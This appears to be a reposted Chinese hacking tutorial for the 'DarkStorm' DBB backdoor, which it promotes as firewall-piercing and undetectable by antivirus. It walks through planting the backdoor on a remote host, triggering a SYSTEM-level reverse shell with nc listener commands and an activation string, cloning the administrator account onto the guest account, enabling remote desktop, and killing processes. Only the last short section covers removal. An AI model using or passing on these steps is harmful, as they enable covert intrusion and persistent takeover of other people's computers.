穿梭于防火墻下的黑馬 DBB后門程序

    今天要為大家介紹的DarkStorm BePassFireWall BackDoor  V1.2是一款成功率極高的反彈端口穿透防火墻的后門程序（以下簡稱DBB），可以穿透99%的防火墻。該后門采用線程插入技術，隱蔽性極高，在系統中以服務形式加載，擁有system權限，一旦運行，很難將其刪除。同時，最重要的是，現在還沒有殺毒軟件能夠查殺它，可以說是現在理想的后門程序了。下面就讓我們一起來領略一下DBB的獨到魅力吧！

　　一、配置后門

　　第一步當然是把DBB當回家，在使用后門前，請先用壓縮包內的config DarkStorm.exe程序配置后門。雙擊運行config DarkStorm.exe，打開如圖1所示的配置對話窗口，根據提示輸入相關數據。其實，該后門支持不經過配置就可直接使用，這時將使用后門的默認配置：反向連接端口是8888，關鍵字是NOIR，服務名是DNScnsvc。

　　小提示：DBB后門服務端由DarkStorm.exe和DarkStorm.dll組成，這兩個exe和DLL文件是可以改名的，但是必須要改成同樣的名字，比如，可以把exe文件改名為123.exe，那么dll文件也要相應的改名為123.dll。

　　二、打開后門

　　要運行后門很簡單，只要將exe和dll文件上傳到遠程主機上之后，直接運行exe文件，后門即可被加載。

　　小提示：exe文件和dll文件不必一定要放到system32中，但必須在同一文件夾下。

　　大家都知道，現在很多情況下主機是在防火墻后面的，如何讓后門來逃避防火墻的火眼金睛呢？這就需要用反向連接功能。DBB是通過嗅探激活字符來啟動反向連接的，僅支持nc反向連接。

　　首先在本地計算機中使用nc監聽本地計算機的8888端口，進入命令行狀態，運行如下命令： nc -l -p 8888。然后再用nc連接目標主機的任何一個防火墻允許的TCP端口（80/139/445.....），接著再開一個命令行窗口，運行命令：nc 220.202.242.101 139，然后輸入激活命令：NOIR:220.202.242.98:8888。其中220.202.242.101為木馬服務端IP地址，NOIR為反彈激活字，220.202.242.98：8888為反向連接的IP地址，也就是本機IP地址及端口。如果反向連接成功，就會在本地計算機中得到目標主機的一個系統權限SHELL（如圖2）。

　　小提示：本地計算機即接受反向SHELL的系統，必須擁有獨立公網IP上網的計算機。另外，由于該后門使用的是無驅動的嗅探，無法嗅探本機對本機發起的數據請求，所以在對本機的測試中，是無法成功的。

　　三、輕松操縱

　　當成功獲取了目標計算機的一個系統權限的SHELL后，就等于已經手握該臺計算機的生殺大權。令人更加欣喜的是，DBB還擁有一些非常實用的控制功能。

　　1.帳戶克隆

　　為了下次能夠順利控制目標計算機，一般的手法就是克隆一個系統權限的帳戶，在這里，使用clone命令就可以輕松克隆一個本地用戶。其語法格式為：clone username clonename password，其中，username是被克隆的用戶的用戶名，一般是administrator；clonename是你要克隆為username的用戶名，一般是guest；password是你為克隆用戶設置的密碼，最長32位。例如，要把Guest克隆為管理員帳戶，并且設置密碼為snow，就只要運行命令：clone administrator guest snow（如圖3）。

　　2.開啟終端服務

　　遠程終端服務可以說是最為理想的遠程控制方式，因此，當成功入侵目標計算機后，大部分人總是想方設法來開啟被控計算機的終端服務。雖然說開啟3389終端服務的方法有很多，可都是有一定難度的。不過還好，有了該后門，只要用一條命令就可以輕松開啟3389服務，其命令為：term port。例如：運行命令“term 3389”（如圖4），這樣就將開啟目標計算機的端終服務，終端服務通訊端口為3389，重新啟動計算機即可生效。

　　小提示：終端服務只在Windows 2000服務器以上版本才擁有。

　　3.進程管理

　　想知道目標計算機運行了哪些程序嗎？很簡單，運行命令：pslist，這樣就可以顯示本地所有用戶進程和相對應的pid號。如果想結束某一進程的運行，請運行命令：pskill pid，提示：pid指的是進程ID號（如圖5）。

　　另外，還有諸如Logoff（注銷當前用戶）、Reboot（重啟系統）、Shutdown（關閉系統）、Poweroff（關閉電源）等命令可供使用。

　　四、封殺后門

　　如果不幸中了該后門，可以通過如下方法來刪除。打開注冊表編輯器，依次展開如下子鍵：HKEY_LOCAL_MACHINESYSTEMCurrentControlSet

　　Services，找到并刪除該子鍵下的DNScnsvc鍵（如圖6），再重新啟動系統即可。若服務名是自己設定的，請刪除相關服務名的子鍵。

原文轉自：http://www.kjueaiud.com